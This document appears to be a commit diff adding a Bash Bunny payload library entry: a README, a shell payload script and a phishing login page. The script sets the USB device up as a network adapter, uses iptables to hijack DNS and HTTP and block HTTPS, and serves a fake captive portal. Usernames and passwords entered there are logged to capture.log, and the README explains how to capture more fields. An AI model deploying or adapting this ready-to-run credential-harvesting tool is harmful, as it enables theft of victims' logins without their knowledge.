Initial Bash Bunny Release

payloads/library/Captiveportal/README.md

@@ -0,0 +1,24 @@
+# Captive Portal for the Bash Bunny
+
+Author: Sebkinne  
+Version: 1.0
+
+## Description
+
+Redirects and spoofs all DNS requests to the Bash Bunny, and serves a configurable captive portal. All captured credentials will be logged in the payload's folder in a file named *capture.log*.
+
+## Configuration
+
+Configured for Windows by default. Swap RNDIS_ETHERNET for ECM_ETHERNET on Mac/*nix.
+
+The *portal.html* file can be modified as seen fit, but changes must remain in the file (no external images, css, or javascript).
+
+To capture more information from the user, simply add more form inputs to *portal.html*, and update the *INPUTS* line in payload.txt. Example: `INPUTS=(email username password)`
+
+## STATUS
+
+| LED              | Status                              |
+| ---------------- | ----------------------------------- |
+| Green (blinking) | The captive portal is starting up   |
+| Blue (solid)     | The captive portal is ready for use |
+

payloads/library/Captiveportal/payload.txt

@@ -0,0 +1,38 @@
+#!/bin/bash
+#
+# Title:         Captiveportal
+# Author:        Sebkinne
+# Version:       1.0
+
+# Add or remove inputs here
+INPUTS=(username password)
+
+# Enable Ethernet (RNDIS = Windows, ECM = mac/*nix)
+ATTACKMODE RNDIS_ETHERNET
+#ATTACKMODE ECM_ETHERNET
+
+##################################################################
+#                  DO NOT EDIT BELOW THIS LINE                   #
+##################################################################
+
+# Sets up iptable forwarding and filters
+function setupNetworking() {
+    echo 1 > /proc/sys/net/ipv4/ip_forward
+    iptables -A INPUT -i usb0 -p udp --dport 53 -j ACCEPT
+    iptables -A INPUT -i usb0 -p tcp --dport 443 -j DROP
+    iptables -t nat -A PREROUTING -i usb0 -p tcp --dport 80 -j DNAT  --to-destination  172.16.64.1:8080
+    iptables -t nat -A PREROUTING -i usb0 -p udp --dport 53 -j DNAT  --to-destination  172.16.64.1:53
+    iptables -t nat -A POSTROUTING -j MASQUERADE
+}
+
+# Find payload directory and execute payload
+function startCaptiveportal() {
+    cd $(dirname $(find /root/udisk/payloads/ -name portal.html))
+    chmod +x captiveportal
+    ./captiveportal ${INPUTS[@]}
+}
+
+LED G 200
+setupNetworking
+startCaptiveportal &
+LED B 0

payloads/library/Captiveportal/portal.html

@@ -0,0 +1,18 @@
+<html>
+<head>
+    <title>Captive Portal</title>
+    <style type="text/css">
+        body {
+            text-align: center;
+        }
+    </style>
+</head>
+<body>
+    <h1>Captive Portal</h1>
+    <form method="post">
+        Username: <input type="username" name="username"><br>
+        Password: <input type="password" name="password"><br>
+        <input type="submit" value="Log in">
+    </form>
+</body>
+</html>